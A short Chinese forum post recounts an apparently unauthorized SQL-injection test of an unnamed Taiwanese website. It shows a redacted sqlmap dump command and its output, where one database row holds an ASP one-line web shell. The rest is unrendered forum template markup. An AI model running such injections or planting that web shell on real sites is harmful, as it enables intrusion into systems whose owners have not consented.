一次对台湾某网站的渗透测试 - 科创网

已屏蔽原因：{{ notice.reason }}已屏蔽

屏蔽解除屏蔽编辑详情

{{notice.noticeContent}}

~~空空如也

9年7个月前 IP:广东

操作

发表于《一次对台湾某网站的渗透测试》

在这之前试了一下手动猜解表，admin和administrator、acens都试过了，没有一个猜出来，感觉其他人写得文章里面的步骤两下就猜出表来了有点不可思议，果然还是要靠工具吗？于是用sqlmap试了一下
上了sqlmap就开始哗啦啦地跑，此处略去大量打印，总之跑完之后猜出了以下的东西

python XXXXXXXXX -u XXXXXXXXXXXXXXXXXXXXX/XXXXXXXXp?id=2 --dump -T banner -C"name,id"
Database: Microsoft_Access_masterdb
Table: banner
[3 entries]
+----+-------------------------------+------------------------------------------+
| id | name                          | picurl                                   |
+----+-------------------------------+------------------------------------------+
| 10 | NULL                          | ../Upload/PicFiles/XXXXXXXXXXXXXXXXXXXg  |
| 3  | <%execute(request("admin"))%> | ../Upload/PicFiles/XXXXXXXXXXXXXXXXXXXXg |
| 4  | NULL                          | ../Upload/PicFiles/XXXXXXXXXXXXXXXXXXXXg |
+----+-------------------------------+------------------------------------------+

回复

文号 / 772410

smith

千古风流

名片发私信
学术分 4
总主题 188 帖总回复 2352 楼拥有证书：学者机友笔友
注册于 2015-01-11 13:58最后登录 2024-11-22 14:51

主体类型：个人

所属领域：无

认证方式：手机号

IP归属地：广东

个人简介

收音机爱好者

文件下载

加载中...

{{errorInfo}}

{{downloadWarning}}

你在 {{downloadTime}} 下载过当前文件。

文件名称：{{resource.defaultFile.name}}

下载次数：{{resource.hits}}

上传用户：{{uploader.username}}

所需积分：{{costScores}}，{{holdScores}}下载当前附件免费{{description}}

下载地址：{{l.name}}

积分不足，去充值

文件已丢失

当前账号的附件下载数量限制如下：

时段	个数
{{f.startingTime}}点 - {{f.endTime}}点	{{f.fileCount}}

视频暂不能访问，请登录试试

仅供内部学术交流或培训使用，请先保存到本地。本内容不代表科创观点，未经原作者同意，请勿转载。

预览

音频暂不能访问，请登录试试

投诉或举报

加载中...

{{tip}}

请选择违规类型：

{{reason.type}}

空空如也

提交成功！

插入资源

全部

图片

视频

音频

附件

全部

未使用

已使用

正在上传

{{b.num+1}}{{b.num+1}}..

跳转到确定

空空如也~

上传中..{{f.progress}}%

处理中..

上传失败，点击重试

等待中...

{{f.name}}

空空如也~

(视频){{r.oname}}

{{selectedResourcesId.indexOf(r.rid) + 1}}

处理中..

处理失败

插入表情

我的表情

共享表情

Emoji

上传

{{b.num+1}}{{b.num+1}}..

跳转到确定

分享

注意事项

最大尺寸100px，超过会被压缩。为保证效果，建议上传前自行处理。
建议上传自己DIY的表情，严禁上传侵权内容。

点击重试等待上传{{s.progress}}%处理中...已上传，正在处理中

空空如也~

处理中...

处理失败

加载中...

草稿箱

加载中...

此处只插入正文，如果要使用草稿中的其余内容，请点击继续创作。

刷新{{b.num+1}}{{b.num+1}}..

{{fromNow(d.toc)}}

{{getDraftInfo(d)}}

标题：{{d.t}}

内容：{{d.c}}

继续创作

删除插入插入

插入公式

温馨提示

1. 公式行内显示(inline)：请使用 $....$ 或 \(....\) 包裹代码

2. 公式独占一行显示(display)：请使用 $$....$$ 或 \[....\] 包裹代码

3. 插入的公式在编辑时不会渲染，请检查无误后再插入。

公式输入

公式预览

$\sum_{i=0}^N\int_{a}^{b}g(t,i)\text{d}t$

评论控制

加载中...

文号：{{pid}}

可查看、可评论

只可查看

不可查看、不可评论

加载中...

详情

推送到专栏从专栏移除

设为匿名取消匿名

查看作者

回复

加入收藏取消收藏

收藏

取消收藏

折叠回复

置顶取消置顶

评学术分

鼓励

设为精选取消精选

管理提醒

编辑

通过审核

评论控制

退修或删除

违规记录

投诉或举报

加入黑名单移除黑名单

查看IP

{{format('YYYY/MM/DD HH:mm:ss', toc)}}

ID: {{user.uid}}

{{user.username}}

用户已注销

{{user.info.certsName}}

{{user.description}}

{{format("YYYY/MM/DD", user.toc)}}注册，{{fromNow(user.tlv)}}活动

{{user.threadCount - user.disabledThreadsCount}}

{{user.postCount - user.disabledPostsCount}}

学术分

{{user.xsf}}